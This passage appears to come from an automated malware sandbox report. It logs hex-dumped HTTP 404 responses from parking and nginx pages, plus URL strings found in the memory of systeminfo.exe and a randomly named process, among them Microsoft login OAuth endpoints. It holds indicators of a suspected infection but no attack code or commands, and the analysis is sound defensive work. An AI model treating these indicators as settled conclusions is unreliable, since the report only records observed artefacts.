6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 
29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:13:02 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 
29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:13:05 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 
29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUHwzHeeaK07BdDXGPgYn90TIdEYVBR1SAV6wEUL1lI8%2BYb6S%2BVcop685tmmlSSj0FiGcF0GeDsMYjQOXsPNOMStMs1TtT0VOgf3VxI7t%2FJTq7zBCJ7t08DLuf1CCQQEWTDnbncWcGWNQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1478&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1Qp0ukKMEeQgs6o%2BwXck7xNYyZcumSwOAJJD84Cj7dF87XdMaCrjGWrYvj9I1MLqY%2FAvcs4d6H8GJZADfCa8Wq5RxkTIsXxXIQqQWFHDY%2FYEnghqv%2FSdyaSNi5bxCMfdQlmsGO%2FzaVmGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7YCUGYchLbJXV%2FJMALRkbPKPygHb%2B2S6JqxaAviQJta1hjsQXmpeKvh65zoEcqumyG5DAZ1QD4k6R1bTTlbGapU%2BK%2F72Hk2jcXlwci3puO1qEYR5NiIEcWJcMk%2B13NCbB%2FpjBUbxiv1Hog%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Content-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1408&sent=1&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10841&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closevary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouUuSoRynzFb31XBRZ2NbLSS0T1agnkjrQ8iKzVwb2%2FXJVMwe4j1yptinmvoxDWI960JcFPZlCnFdzpt%2Fr6jJDHeebcMa07RucPBdwvXO30T3NJu5Jwyf8UPm%2BgwGEeCvp941JjH4M9fGA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=1399&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=468&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:39 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:44 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:13:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033)
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: systeminfo.exe, 00000007.00000003.2250291188.000000000789E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/css/parking2.css
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-desplegar.jpg
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-facebook-small.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-hosting.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-parking.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-ssl-parking.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-twitter-small.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web-sencilla.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web.png
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://plus.google.com/u/0/102310483732773374239
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camp
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/piensasolutions
                Source: systeminfo.exe, 00000007.00000002.4151114745.00000000078B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.0000000005F66000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000003846000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=we
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dom
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=host
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
